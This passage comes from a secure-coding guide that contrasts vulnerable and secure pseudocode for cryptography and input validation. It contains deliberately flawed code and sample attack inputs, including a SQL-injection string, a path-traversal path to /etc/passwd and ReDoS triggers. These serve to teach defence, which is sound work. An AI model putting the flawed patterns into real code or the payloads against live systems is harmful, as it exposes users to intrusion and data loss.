counter exhausted - rotate key") + nonce = this.prefix + intToBytes(this.counter, 8) + this.lock.release() + return nonce + +// SECURE: Synthetic IV (SIV) for nonce-misuse resistance +function encryptSIV(plaintext, key): + // AES-GCM-SIV: Safe even if nonce is accidentally repeated + nonce = generateSecureRandom(12) + ciphertext = AES_GCM_SIV_encrypt(key, nonce, plaintext) + return nonce + ciphertext + // Note: Repeated nonce only leaks if same plaintext encrypted +``` + +**Why This Is Secure:** +- 
Random IVs prevent pattern analysis across messages +- Prepending IV to ciphertext ensures IV is always available for decryption +- Counter with random prefix prevents nonce collision across instances +- SIV modes provide safety net against accidental nonce reuse + +--- + +### GOOD Example 4: Cryptographically Secure Random + +```pseudocode +// SECURE: Using OS/platform CSPRNG + +// Node.js +function generateSecureRandom(length): + return crypto.randomBytes(length) + +// Python +function generateSecureRandom(length): + return secrets.token_bytes(length) + +// Java +function generateSecureRandom(length): + random = SecureRandom.getInstanceStrong() + bytes = new byte[length] + random.nextBytes(bytes) + return bytes + +// Go +function generateSecureRandom(length): + bytes = make([]byte, length) + _, err = crypto_rand.Read(bytes) + if err != nil: + panic("CSPRNG failure") + return bytes + +// SECURE: Token generation for URLs/APIs +function generateUrlSafeToken(length): + // Generate random bytes, encode to URL-safe base64 + randomBytes = generateSecureRandom(length) + return base64UrlEncode(randomBytes) + +function generateResetToken(): + // 256 bits of entropy for password reset token + return generateUrlSafeToken(32) + +function generateApiKey(): + // Prefix for identification + random component + prefix = "sk_live_" + randomPart = generateUrlSafeToken(24) + return prefix + randomPart + +// SECURE: Random number in range +function secureRandomInt(min, max): + range = max - min + 1 + bytesNeeded = ceil(log2(range) / 8) + + // Rejection sampling to avoid modulo bias + while true: + randomBytes = generateSecureRandom(bytesNeeded) + value = bytesToInt(randomBytes) + if value < (2^(bytesNeeded*8) / range) * range: + return min + (value % range) +``` + +**Why This Is Secure:** +- CSPRNG (Cryptographically Secure PRNG) uses OS entropy sources +- Cannot be predicted even with complete knowledge of outputs +- Proper rejection sampling avoids modulo bias +- Standard libraries 
provide secure defaults when used correctly + +--- + +### GOOD Example 5: Key Derivation Functions + +```pseudocode +// SECURE: PBKDF2 with sufficient iterations +function deriveKeyPBKDF2(password, purpose): + // Generate unique salt per derivation + salt = generateSecureRandom(16) + + // 600,000 iterations minimum for SHA-256 (2025) + iterations = 600000 + + // Derive key of required length + derivedKey = PBKDF2( + password = password, + salt = salt, + iterations = iterations, + keyLength = 32, // 256 bits + hashFunction = SHA256 + ) + + // Store salt with derived key for later verification + return {salt: salt, key: derivedKey} + +// SECURE: HKDF for deriving multiple keys from one secret +function deriveMultipleKeys(masterSecret, purpose): + // HKDF-Extract: Create pseudorandom key from input + salt = generateSecureRandom(32) + prk = HKDF_Extract(salt, masterSecret) + + // HKDF-Expand: Derive purpose-specific keys + encryptionKey = HKDF_Expand(prk, info = "encryption", length = 32) + hmacKey = HKDF_Expand(prk, info = "authentication", length = 32) + searchKey = HKDF_Expand(prk, info = "search-index", length = 32) + + return { + encryption: encryptionKey, + hmac: hmacKey, + search: searchKey, + salt: salt // Store for re-derivation + } + +// SECURE: Argon2 for password-based key derivation +function deriveKeyFromPassword(password, salt = null): + if salt == null: + salt = generateSecureRandom(16) + + derivedKey = argon2id( + password = password, + salt = salt, + memoryCost = 65536, // 64 MB + timeCost = 3, + parallelism = 4, + outputLength = 32 + ) + + return {key: derivedKey, salt: salt} + +// SECURE: Key derivation with domain separation +function deriveKeyWithContext(masterKey, context, subkeyId): + // Context prevents cross-purpose key use + info = context + ":" + subkeyId + return HKDF_Expand(masterKey, info, 32) + +// Example: Derive per-user encryption keys +function getUserEncryptionKey(masterKey, userId): + return deriveKeyWithContext(masterKey, 
"user-data-encryption", userId) +``` + +**Why This Is Secure:** +- High iteration counts make brute-force impractical +- HKDF properly separates multiple keys from one source +- Domain separation prevents keys derived for one purpose being used for another +- Argon2 provides memory-hard protection against GPU attacks +- Unique salt per derivation prevents precomputation attacks + +--- + +### GOOD Example 6: Key Rotation Patterns + +```pseudocode +// SECURE: Key versioning for rotation +class KeyManager: + function __init__(keyStore): + this.keyStore = keyStore + this.currentKeyVersion = keyStore.getCurrentVersion() + + function encrypt(plaintext): + key = this.keyStore.getKey(this.currentKeyVersion) + nonce = generateSecureRandom(12) + + ciphertext = AES_GCM_encrypt(key, nonce, plaintext) + + // Include key version in output for decryption + return encodeVersionedCiphertext( + version = this.currentKeyVersion, + nonce = nonce, + ciphertext = ciphertext + ) + + function decrypt(encryptedData): + version, nonce, ciphertext = decodeVersionedCiphertext(encryptedData) + + // Fetch correct key version (may be old version) + key = this.keyStore.getKey(version) + if key == null: + throw KeyNotFoundError("Key version " + version + " not available") + + return AES_GCM_decrypt(key, nonce, ciphertext) + + function rotateKey(): + newVersion = this.currentKeyVersion + 1 + newKey = generateSecureRandom(32) + this.keyStore.storeKey(newVersion, newKey) + this.currentKeyVersion = newVersion + + // Schedule background re-encryption of old data + scheduleReEncryption(newVersion - 1, newVersion) + +// SECURE: Re-encryption during key rotation +function reEncryptData(dataId, oldVersion, newVersion, keyManager): + // Fetch encrypted data + encryptedData = database.get("encrypted_data", dataId) + + // Verify it uses old key version + currentVersion = extractKeyVersion(encryptedData) + if currentVersion >= newVersion: + return // Already using new or newer key + + // Decrypt with old key, 
re-encrypt with new + plaintext = keyManager.decrypt(encryptedData) + newEncryptedData = keyManager.encrypt(plaintext) + + // Atomic update + database.update("encrypted_data", dataId, { + "data": newEncryptedData, + "key_version": newVersion, + "rotated_at": getCurrentTimestamp() + }) + +// SECURE: Key wrapping for storage +function storeEncryptionKey(keyToStore, masterKey): + // Wrap (encrypt) the key with master key + nonce = generateSecureRandom(12) + wrappedKey = AES_GCM_encrypt(masterKey, nonce, keyToStore) + + return { + wrapped_key: wrappedKey, + nonce: nonce, + algorithm: "AES-256-GCM", + created_at: getCurrentTimestamp() + } + +function retrieveEncryptionKey(wrappedKeyData, masterKey): + return AES_GCM_decrypt( + masterKey, + wrappedKeyData.nonce, + wrappedKeyData.wrapped_key + ) +``` + +**Why This Is Secure:** +- Key versioning allows old data to remain decryptable during rotation +- Background re-encryption gradually migrates all data to new key +- Key wrapping protects stored keys at rest +- Gradual rotation minimizes operational risk + +--- + +## Edge Cases Section + +### Edge Case 1: Padding Oracle Vulnerabilities + +```pseudocode +// VULNERABLE: Revealing padding validity in error messages +function decryptCBC_vulnerable(ciphertext, key, iv): + try: + plaintext = AES_CBC_decrypt(key, iv, ciphertext) + unpadded = removePKCS7Padding(plaintext) + return {success: true, data: unpadded} + catch PaddingError: + return {success: false, error: "Invalid padding"} // ORACLE! 
+ catch DecryptionError: + return {success: false, error: "Decryption failed"} + +// Attack: Padding oracle allows full plaintext recovery +// Attacker modifies ciphertext bytes, observes padding errors +// ~128 requests per byte to recover plaintext (on average) + +// SECURE: Encrypt-then-MAC with separate keys and one generic error +function decryptCBC_secure(ciphertext, encKey, macKey, iv): + try: + // First verify HMAC before any decryption + providedHmac = ciphertext[-32:] + ciphertextData = ciphertext[:-32] + + // macKey is distinct from encKey (see Edge Case 4: Key Reuse Across Contexts) + expectedHmac = HMAC_SHA256(macKey, iv + ciphertextData) + if not constantTimeEquals(providedHmac, expectedHmac): + return {success: false, error: "Decryption failed"} // Generic error + + plaintext = AES_CBC_decrypt(encKey, iv, ciphertextData) + unpadded = removePKCS7Padding(plaintext) + return {success: true, data: unpadded} + catch: + return {success: false, error: "Decryption failed"} // Same error always + +// BEST: Just use GCM which prevents this class of attack entirely +``` + +**Lesson Learned:** +- Never reveal whether padding was valid or invalid +- Always use authenticated encryption (encrypt-then-MAC or GCM) +- Return identical errors for all decryption failures + +--- + +### Edge Case 2: Length Extension Attacks + +```pseudocode +// VULNERABLE: Using hash(secret + message) for authentication +function createAuthToken(secretKey, message): + return sha256(secretKey + message) // Length extension vulnerable! + +function verifyAuthToken(secretKey, message, token): + expected = sha256(secretKey + message) + return token == expected + +// Attack: Attacker knows hash(secret + message) and length of secret +// Can compute hash(secret + message + padding + attacker_data) +// Without knowing the secret! + +// Example attack: +// Original: hash(secret + "amount=100") = abc123... +// Attacker computes: hash(secret + "amount=100" + padding + "&amount=999") +// Server verifies this as valid! 
+ +// SECURE: Use HMAC +function createAuthTokenSecure(secretKey, message): + return HMAC_SHA256(secretKey, message) + +function verifyAuthTokenSecure(secretKey, message, token): + expected = HMAC_SHA256(secretKey, message) + return constantTimeEquals(token, expected) + +// WEAKER ALTERNATIVE: hash(message + secret) blocks length extension but relies on collision resistance; prefer HMAC +// ALTERNATIVE: SHA-3 or SHA-512/256 (resistant to length extension) +function alternativeAuth(secretKey, message): + return SHA3_256(secretKey + message) // SHA-3 is resistant +``` + +**Lesson Learned:** +- Never use hash(key + message) with Merkle-Damgård hashes (MD5, SHA1, SHA256, SHA512) for authentication +- HMAC is specifically designed to prevent length extension +- SHA-3 family is resistant but HMAC is still recommended for consistency + +--- + +### Edge Case 3: Timing Attacks on Comparison + +```pseudocode +// VULNERABLE: Early-exit string comparison +function verifyToken(providedToken, expectedToken): + if length(providedToken) != length(expectedToken): + return false + for i in range(length(providedToken)): + if providedToken[i] != expectedToken[i]: + return false // Early exit reveals position of first difference + return true + +// Attack: Timing differences reveal correct characters +// A correct first char makes the comparison run measurably longer than a wrong one +// Attacker can brute-force character-by-character + +// VULNERABLE: Using == operator (language-dependent timing) +function checkHmac(provided, expected): + return provided == expected // May have variable-time implementation + +// SECURE: Constant-time comparison +function constantTimeEquals(a, b): + if length(a) != length(b): + // Early return leaks only that the lengths differ; + // MAC and token lengths are usually public, otherwise compare fixed-length digests + return false + + result = 0 + for i in range(length(a)): + // XOR and OR accumulate differences without early exit + result = result | (a[i] XOR b[i]) + return result == 0 + +// SECURE: Using crypto library comparison +function verifyHmacSecure(message, providedHmac, key): + expectedHmac = HMAC_SHA256(key, 
message) + return crypto.timingSafeEqual(providedHmac, expectedHmac) + +// SECURE: Double-HMAC comparison (timing-safe by design) +function verifyWithDoubleHmac(message, providedMac, key): + expectedMac = HMAC_SHA256(key, message) + // Compare HMACs of the MACs - timing doesn't leak original MAC + return HMAC_SHA256(key, providedMac) == HMAC_SHA256(key, expectedMac) +``` + +**Lesson Learned:** +- Use constant-time comparison for all secret-dependent operations +- Most languages have crypto libraries with timing-safe functions +- Double-HMAC trick works when constant-time compare isn't available + +--- + +### Edge Case 4: Key Reuse Across Contexts + +```pseudocode +// VULNERABLE: Same key for encryption and authentication +SHARED_KEY = loadKey("master") + +function encryptData(data): + return AES_GCM_encrypt(SHARED_KEY, generateNonce(), data) + +function signData(data): + return HMAC_SHA256(SHARED_KEY, data) // Same key! + +// Problem: Cryptographic interactions between uses +// Some attacks become possible when key is used in multiple algorithms + +// VULNERABLE: Same key for different users/tenants +function encryptForTenant(tenantId, data): + return AES_GCM_encrypt(MASTER_KEY, generateNonce(), data) + // All tenants share encryption key - one compromise = all compromised + +// SECURE: Derive separate keys for each purpose +MASTER_KEY = loadKey("master") + +function getEncryptionKey(): + return HKDF_Expand(MASTER_KEY, "encryption-aes-256-gcm", 32) + +function getAuthenticationKey(): + return HKDF_Expand(MASTER_KEY, "authentication-hmac-sha256", 32) + +function getSearchKey(): + return HKDF_Expand(MASTER_KEY, "searchable-encryption", 32) + +// SECURE: Per-tenant key derivation +function getTenantEncryptionKey(tenantId): + // Each tenant gets unique derived key + info = "tenant-encryption:" + tenantId + return HKDF_Expand(MASTER_KEY, info, 32) + +function encryptForTenantSecure(tenantId, data): + tenantKey = getTenantEncryptionKey(tenantId) + return 
AES_GCM_encrypt(tenantKey, generateNonce(), data) +``` + +**Lesson Learned:** +- Always derive separate keys for different cryptographic operations +- Use domain separation (different "info" parameters) in HKDF +- Per-tenant/per-user key derivation limits blast radius of compromise + +--- + +## Common Mistakes Section + +### Common Mistake 1: Using Encryption Without Authentication + +```pseudocode +// COMMON MISTAKE: CBC encryption without HMAC +function encryptDataWrong(data, key): + iv = generateSecureRandom(16) + ciphertext = AES_CBC_encrypt(key, iv, data) + return iv + ciphertext + // Missing: No way to detect tampering! + +// Attack: Bit-flipping in CBC mode +// Flipping bit N in ciphertext block C[i] flips bit N in plaintext block P[i+1] +// Attacker can modify data without detection + +// Example: Encrypted JSON {"admin": false, "amount": 100} +// Attacker can flip bits to change "false" to "true" or modify amount + +// CORRECT: Encrypt-then-MAC +function encryptDataCorrect(data, encKey, macKey): + iv = generateSecureRandom(16) + ciphertext = AES_CBC_encrypt(encKey, iv, data) + + // MAC covers IV and ciphertext + mac = HMAC_SHA256(macKey, iv + ciphertext) + + return iv + ciphertext + mac + +function decryptDataCorrect(encrypted, encKey, macKey): + iv = encrypted[:16] + mac = encrypted[-32:] + ciphertext = encrypted[16:-32] + + // Verify MAC FIRST, before any decryption + expectedMac = HMAC_SHA256(macKey, iv + ciphertext) + if not constantTimeEquals(mac, expectedMac): + throw IntegrityError("Data has been tampered with") + + return AES_CBC_decrypt(encKey, iv, ciphertext) + +// BETTER: Just use GCM which includes authentication +function encryptDataBest(data, key): + nonce = generateSecureRandom(12) + ciphertext, tag = AES_GCM_encrypt(key, nonce, data) + return nonce + ciphertext + tag +``` + +**Solution:** +- Always use authenticated encryption (GCM, ChaCha20-Poly1305) +- If using CBC, add HMAC with encrypt-then-MAC pattern +- Verify authentication tag 
BEFORE decryption + +--- + +### Common Mistake 2: Confusing Encoding with Encryption + +```pseudocode +// COMMON MISTAKE: Base64 as "encryption" +function "encrypt"Data(sensitiveData): + return base64Encode(sensitiveData) // NOT ENCRYPTION! + +function "decrypt"Data(encodedData): + return base64Decode(encodedData) + +// COMMON MISTAKE: XOR with short key as encryption +function "encrypt"WithXor(data, password): + key = password.repeat(ceil(length(data) / length(password))) + return xor(data, key) // Trivially broken with frequency analysis + +// COMMON MISTAKE: ROT13 or character substitution +function "encrypt"Text(text): + return rot13(text) // No security at all + +// COMMON MISTAKE: Obfuscation ≠ encryption +function storeApiKey(apiKey): + obfuscated = "" + for char in apiKey: + obfuscated += chr(ord(char) + 5) // Just shifted characters + return obfuscated + +// COMMON MISTAKE: Custom "encryption" algorithm +function myEncrypt(data, key): + result = "" + for i, char in enumerate(data): + newChar = chr((ord(char) + ord(key[i % len(key)]) * 7) % 256) + result += newChar + return result // Easily broken - don't invent crypto! +``` + +**Reality Check:** +| Method | Security Level | Use Case | +|--------|----------------|----------| +| Base64 | 0 (None) | Binary-to-text encoding only | +| ROT13 | 0 (None) | Jokes, spoiler hiding | +| XOR with repeated key | Trivially broken | Never use | +| Homegrown "encryption" | Unknown, likely broken | Never use | +| AES-GCM with random key | Strong | Actual encryption | + +**Solution:** +- Use standard algorithms: AES-GCM, ChaCha20-Poly1305 +- Never invent cryptographic algorithms +- Encoding (Base64, hex) is for representation, not security + +--- + +### Common Mistake 3: Improper Key Storage After Generation + +```pseudocode +// COMMON MISTAKE: Logging the key +function generateAndStoreKey(): + key = generateSecureRandom(32) + log.info("Generated new encryption key: " + hexEncode(key)) // LOGGED! 
+ return key + +// COMMON MISTAKE: Key in config file committed to git +// config.json: +{ + "database_url": "...", + "encryption_key": "a1b2c3d4e5f6..." // Will be in git history forever +} + +// COMMON MISTAKE: Key in environment variable readable by other processes +// Launching: ENCRYPTION_KEY=secret123 ./myapp +// The launch command lands in shell history, and on Linux the value is +// readable via `ps e` or /proc/<pid>/environ by the same user and root + +// COMMON MISTAKE: Key stored in database alongside encrypted data +function storeEncryptedData(userId, sensitiveData): + key = generateSecureRandom(32) + encrypted = AES_GCM_encrypt(key, generateNonce(), sensitiveData) + database.insert("user_data", { + user_id: userId, + encrypted_data: encrypted, + encryption_key: key // KEY NEXT TO DATA = pointless encryption + }) + +// COMMON MISTAKE: Key derivation material stored insecurely +function setupEncryption(password): + salt = generateSecureRandom(16) + key = deriveKey(password, salt) + + // Storing in easily accessible location + localStorage.setItem("encryption_salt", salt) + localStorage.setItem("derived_key", key) // KEY IN BROWSER STORAGE! 
+``` + +**Secure Key Storage Patterns:** +```pseudocode +// SECURE: Using a key management service (KMS) +function storeKeySecurely(keyId, keyMaterial): + // AWS KMS, Azure Key Vault, GCP KMS, HashiCorp Vault + kms.storeKey(keyId, keyMaterial, { + rotation_period: "90 days", + deletion_protection: true, + access_policy: restrictedPolicy + }) + +// SECURE: Key wrapped with hardware security module (HSM) +function wrapKeyForStorage(dataKey): + wrappingKey = hsm.getWrappingKey() // Never leaves HSM + wrappedKey = hsm.wrapKey(dataKey, wrappingKey) + return wrappedKey // Safe to store - can only unwrap with HSM + +// SECURE: Envelope encryption pattern +function envelopeEncrypt(data): + // Generate data encryption key (DEK) + dek = generateSecureRandom(32) + + // Encrypt data with DEK + encryptedData = AES_GCM_encrypt(dek, generateNonce(), data) + + // Encrypt DEK with key encryption key (KEK) from KMS + encryptedDek = kms.encrypt(dek) + + // Store encrypted DEK with encrypted data + return { + encrypted_data: encryptedData, + encrypted_key: encryptedDek, // DEK is encrypted, safe to store + kms_key_id: kms.getCurrentKeyId() + } +``` + +--- + +## Algorithm Selection Guidance + +### Symmetric Encryption + +| Algorithm | Key Size | Use Case | Notes | +|-----------|----------|----------|-------| +| **AES-256-GCM** | 256 bits | General purpose | Recommended default, 96-bit nonce | +| **ChaCha20-Poly1305** | 256 bits | Performance-sensitive, mobile | Faster without AES-NI hardware | +| **XChaCha20-Poly1305** | 256 bits | High-volume encryption | 192-bit nonce, safe for random generation | +| **AES-256-GCM-SIV** | 256 bits | Nonce-misuse resistant | Slightly slower, safer with accidental reuse | + +**Avoid:** DES, 3DES, RC4, Blowfish, AES-ECB, AES-CBC without HMAC + +### Password Hashing + +| Algorithm | Memory | Use Case | Notes | +|-----------|--------|----------|-------| +| **Argon2id** | 64+ MB | New applications | Best protection, memory-hard | +| **bcrypt** | N/A | 
Legacy compatibility | Widely supported, cost 12+ | +| **scrypt** | 64+ MB | When Argon2 unavailable | Good alternative | + +**Avoid:** MD5, SHA1, SHA256 (single round), PBKDF2 with <600k iterations + +### Key Derivation + +| Algorithm | Use Case | Notes | +|-----------|----------|-------| +| **Argon2id** | Password-based | Best for password → key | +| **HKDF** | Key expansion | Deriving multiple keys from one | +| **PBKDF2-SHA256** | Compatibility | 600k+ iterations required | + +**Avoid:** MD5-based KDF, single-hash derivation, low iteration counts + +### Message Authentication + +| Algorithm | Output | Use Case | Notes | +|-----------|--------|----------|-------| +| **HMAC-SHA256** | 256 bits | General purpose | Standard choice | +| **HMAC-SHA512** | 512 bits | Extra security margin | Faster on 64-bit | +| **Poly1305** | 128 bits | With ChaCha20 | Part of AEAD | + +**Avoid:** MD5, SHA1, plain hash without HMAC construction + +### Digital Signatures + +| Algorithm | Use Case | Notes | +|-----------|----------|-------| +| **Ed25519** | General purpose | Fast, secure, simple API | +| **ECDSA P-256** | Compatibility | Widely supported | +| **RSA-PSS** | Legacy systems | 2048+ bit key required | + +**Avoid:** RSA PKCS#1 v1.5, DSA, ECDSA with weak curves + +--- + +## Detection Hints: How to Spot Cryptographic Issues + +### Code Review Patterns + +```pseudocode +// RED FLAGS in cryptographic code: + +// 1. Weak hash functions +md5( // Search for: md5\s*\( +sha1( // Search for: sha1\s*\( +SHA1.Create() // Search for: SHA1 + +// 2. ECB mode +mode = "ECB" // Search for: ECB +AES/ECB/ // Search for: /ECB/ +mode_ECB // Search for: ECB + +// 3. Static or weak IVs +iv = [0, 0, 0, ... // Search for: iv\s*=\s*\[0 +IV = "0000 // Search for: IV\s*=\s*["']0 +static IV // Search for: static.*[Ii][Vv] + +// 4. Math.random for security +Math.random() // Search for: Math\.random +random.randint( // Search for: randint\( (context matters) + +// 5. 
Weak secrets += "secret" // Search for: =\s*["']secret +SECRET = " // Search for: SECRET\s*=\s*["'] += "password" // Search for: =\s*["']password + +// 6. Direct password use as key +key = password // Search for: key\s*=\s*password +AES(password) // Search for: AES\s*\(\s*password + +// 7. Low iteration counts +iterations: 1000 // Search for: iterations.*\d{1,4}[^0-9] +rounds = 100 // Search for: rounds\s*=\s*\d{1,3}[^0-9] + +// GREP patterns for security review: +// [Mm][Dd]5\s*\( +// [Ss][Hh][Aa]1\s*\( +// ECB +// [Ii][Vv]\s*=\s*\[0 +// Math\.random +// iterations.*[0-9]{1,4}[^0-9] +// (password|secret)\s*=\s*["'] +``` + +### Security Testing Checklist + +```pseudocode +// Cryptographic security test cases: + +// 1. Algorithm verification +- [ ] No MD5 or SHA1 for password hashing +- [ ] No ECB mode encryption +- [ ] AES key size is 256 bits (not 128) +- [ ] Authenticated encryption used (GCM, ChaCha20-Poly1305) + +// 2. Randomness verification +- [ ] IVs/nonces are cryptographically random +- [ ] Session tokens use CSPRNG +- [ ] No predictable seeds for random generation + +// 3. Key management +- [ ] Keys not hardcoded in source +- [ ] Keys not logged or exposed in errors +- [ ] Key derivation uses appropriate KDF +- [ ] Key rotation mechanism exists + +// 4. Password hashing +- [ ] bcrypt cost ≥ 12 or Argon2 with appropriate params +- [ ] Unique salt per password +- [ ] Timing-safe comparison used + +// 5. 
Implementation details +- [ ] Constant-time comparison for secrets +- [ ] No padding oracle vulnerabilities +- [ ] HMAC used (not hash(key+message)) +- [ ] Authenticated encryption or encrypt-then-MAC +``` + +--- + +## Security Checklist + +- [ ] Password hashing uses Argon2id, bcrypt (cost 12+), or scrypt +- [ ] All passwords have unique, random salts (automatically handled by bcrypt/Argon2) +- [ ] No MD5, SHA1, or single-round SHA256 for security-sensitive hashing +- [ ] Encryption uses authenticated modes (AES-GCM, ChaCha20-Poly1305) +- [ ] No ECB mode encryption +- [ ] IVs/nonces generated with cryptographically secure random +- [ ] Each encryption operation uses unique IV/nonce +- [ ] GCM nonces tracked to prevent reuse (or use SIV modes) +- [ ] All random values for security use CSPRNG (crypto.randomBytes, secrets module) +- [ ] No Math.random() or similar PRNGs for security +- [ ] Encryption keys are 256 bits and properly random +- [ ] No hardcoded keys in source code +- [ ] Keys derived with HKDF, PBKDF2 (600k+ iterations), or Argon2 +- [ ] Separate keys derived for different cryptographic operations +- [ ] Key rotation mechanism implemented +- [ ] Keys stored in KMS, HSM, or encrypted at rest +- [ ] Timing-safe comparison used for all secret comparisons +- [ ] HMAC used instead of hash(key+message) +- [ ] Error messages don't reveal cryptographic details (padding validity, etc.) 
+- [ ] No custom cryptographic algorithms—only standard, vetted primitives + +--- + +# Pattern 6: Input Validation and Data Sanitization + +**CWE References:** CWE-20 (Improper Input Validation), CWE-1286 (Improper Validation of Syntactic Correctness of Input), CWE-185 (Incorrect Regular Expression), CWE-1333 (Inefficient Regular Expression Complexity), CWE-129 (Improper Validation of Array Index) + +**Priority Score:** 21 (Frequency: 9, Severity: 7, Detectability: 5) + +--- + +## Introduction: The Foundation That AI Frequently Skips + +Input validation is the **first line of defense** against virtually all injection attacks, data corruption, and application crashes. Yet AI-generated code consistently fails to implement proper validation, treating it as an afterthought or skipping it entirely. + +**Why AI Models Skip or Fail at Input Validation:** + +1. **Training Data Focuses on "Happy Path":** Most tutorial code, documentation examples, and Stack Overflow answers demonstrate functionality with expected inputs. Validation code is often omitted for brevity, teaching AI that it's optional. + +2. **Validation Is Contextual:** Proper validation depends on business rules, data types, and downstream usage—context that AI often lacks. The model can't know that a "name" field shouldn't exceed 100 characters or that an "age" must be between 0 and 150. + +3. **Client-Side Validation Appears Complete:** AI training data often contains client-side form validation (JavaScript). The model learns these patterns but fails to understand that server-side validation is the actual security boundary. + +4. **Regex Complexity:** AI generates complex regex patterns that may be vulnerable to catastrophic backtracking (ReDoS) or miss edge cases. The model optimizes for matching expected patterns, not rejecting malicious ones. + +5. **Trust Boundary Confusion:** AI doesn't inherently understand which data sources are trustworthy. 
It may validate user form input but trust data from internal APIs, databases, or message queues that could also be compromised. + +6. **Type System Overconfidence:** In typed languages, AI may assume type declarations are sufficient validation, missing the need for range checks, format validation, and semantic constraints. + +**Why This Matters - The Foundation of All Injection Attacks:** + +Every major vulnerability class depends on inadequate input validation: +- **SQL Injection:** Unvalidated input in queries +- **Command Injection:** Unvalidated input in shell commands +- **XSS:** Unvalidated input rendered in HTML +- **Path Traversal:** Unvalidated file paths +- **Deserialization Attacks:** Unvalidated serialized objects +- **Buffer Overflows:** Unvalidated input lengths +- **Business Logic Bypass:** Unvalidated business constraints + +**Impact Statistics:** +- CWE-20 (Improper Input Validation) appears in OWASP Top 10 as a root cause of multiple vulnerabilities +- 42% of SQL injection vulnerabilities trace back to missing input validation (NIST NVD analysis) +- ReDoS vulnerabilities increased 143% year-over-year in npm packages (Snyk 2024) +- 67% of AI-generated validation code only validates on the client side (Security research 2025) + +--- + +## BAD Examples: Different Manifestations + +### BAD Example 1: Client-Side Only Validation + +```pseudocode +// VULNERABLE: All validation in frontend, server trusts everything + +// Frontend validation (JavaScript) +function validateForm(form): + if form.email is empty: + showError("Email required") + return false + + if not isValidEmail(form.email): + showError("Invalid email format") + return false + + if form.password.length < 8: + showError("Password must be 8+ characters") + return false + + if form.age < 0 or form.age > 150: + showError("Invalid age") + return false + + // Form is "valid", submit to server + return true + +// Backend endpoint (VULNERABLE - no validation) +function handleRegistration(request): 
+ // AI assumes frontend validated, so just use the data + email = request.body.email // Could be anything + password = request.body.password // Could be empty + age = request.body.age // Could be -1 or 9999999 + + // Directly store in database + query = "INSERT INTO users (email, password, age) VALUES (?, ?, ?)" + database.execute(query, [email, hashPassword(password), age]) + + return {"success": true} +``` + +**Why This Is Dangerous:** +- Attackers bypass JavaScript by sending direct HTTP requests (curl, Postman, scripts) +- Browser dev tools allow modifying form data before submission +- Server receives arbitrary data with no protection +- Data integrity issues cascade through the application +- SQL injection still possible if query construction is vulnerable elsewhere + +**Attack Scenario:** +```pseudocode +// Attacker sends directly to API: +POST /api/register +Content-Type: application/json + +{ + "email": "'; DROP TABLE users; --", + "password": "", + "age": -9999999999 +} +``` + +--- + +### BAD Example 2: Partial Validation (Type but Not Range) + +```pseudocode +// VULNERABLE: Validates type exists, ignores business constraints + +function processPayment(request): + // Type checking only + if typeof(request.amount) != "number": + return error("Amount must be a number") + + if typeof(request.quantity) != "integer": + return error("Quantity must be an integer") + + // MISSING: Range validation + // amount could be negative (refund attack) + // quantity could be 0 or MAX_INT (business logic bypass) + + total = request.amount * request.quantity + chargeCustomer(request.customerId, total) + + return {"charged": total} + +// Attacker exploits: +{ + "amount": -100.00, // Negative = credit instead of charge + "quantity": 999999999, // Integer overflow potential + "customerId": "12345" +} +``` + +**Why This Is Dangerous:** +- Type validation is necessary but not sufficient +- Business logic depends on reasonable ranges +- Integer overflow can wrap to unexpected 
values +- Negative values can invert expected behavior +- Zero values can bypass payment or cause division errors + +--- + +### BAD Example 3: Regex Without Anchors + +```pseudocode +// VULNERABLE: Regex matches substring, not entire input + +// Email validation without anchors +EMAIL_PATTERN = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" + +function validateEmail(email): + if regex.match(EMAIL_PATTERN, email): + return true + return false + +// This PASSES validation: +validateEmail("MALICIOUS_PAYLOAD user@example.com MALICIOUS_PAYLOAD") +// Because "user@example.com" matches somewhere in the string + +// Filename validation without anchors +SAFE_FILENAME = "[a-zA-Z0-9_-]+" + +function validateFilename(filename): + if regex.match(SAFE_FILENAME, filename): + return true + return false + +// This PASSES validation: +validateFilename("../../../etc/passwd") +// Because "etc" matches the pattern somewhere in the string +``` + +**Why This Is Dangerous:** +- Regex matches anywhere in string, not the complete input +- Injection payloads can surround or precede valid patterns +- Path traversal bypasses filename validation +- Email field can contain XSS payloads around valid address +- Common in AI-generated code which copies regex patterns without anchors + +**Fix Preview:** +```pseudocode +// SECURE: Use ^ and $ anchors to match entire input +EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$" +SAFE_FILENAME = "^[a-zA-Z0-9_-]+$" +``` + +--- + +### BAD Example 4: ReDoS-Vulnerable Patterns + +```pseudocode +// VULNERABLE: Catastrophic backtracking regex patterns + +// Email validation with ReDoS vulnerability +// Pattern: nested quantifiers with overlapping character classes +VULNERABLE_EMAIL = "^([a-zA-Z0-9]+)*@[a-zA-Z0-9]+\.[a-zA-Z]+$" + +// Attack input: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!" 
+// The regex engine backtracks exponentially trying all combinations + +// URL validation with ReDoS +VULNERABLE_URL = "^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$" + +// Attack input: long string of valid URL characters followed by invalid character +// "http://example.com/" + "a" * 30 + "!" + +// Naive duplicate word finder (common tutorial example) +DUPLICATE_WORDS = "\b(\w+)\s+\1\b" +// Can hang on: "word word word word word word word word word word!" + +function validateInput(input, pattern): + // This can hang for minutes or crash the server + return regex.match(pattern, input) +``` + +**Why This Is Dangerous:** +- Single malicious request can consume 100% CPU for minutes +- Denial of Service without requiring many requests +- AI copies these patterns from tutorials without understanding complexity +- Nested quantifiers `(a+)+`, `(a*)*`, `(a?)*` are red flags +- Overlapping character classes compound the problem + +**ReDoS Complexity Analysis:** +```pseudocode +// Pattern: (a+)+$ +// Input: "aaaaaaaaaaaaaaaaaaaaaaaaX" +// +// For 25 'a's followed by 'X': +// - The engine tries every possible way to split the 'a's between groups +// - Time complexity: O(2^n) where n is input length +// - 25 chars = 33 million+ combinations to try +// - 30 chars = 1 billion+ combinations +``` + +--- + +### BAD Example 5: Missing Null/Undefined Checks + +```pseudocode +// VULNERABLE: Assumes data structure completeness + +function processUserProfile(user): + // No null checks - any missing field crashes + fullName = user.firstName + " " + user.lastName // Crash if null + + emailDomain = user.email.split("@")[1] // Crash if email is null + + age = parseInt(user.profile.age) // Crash if profile is null + + // Process address (deeply nested) + city = user.profile.address.city.toUpperCase() // Multiple crash points + + return { + "name": fullName, + "domain": emailDomain, + "age": 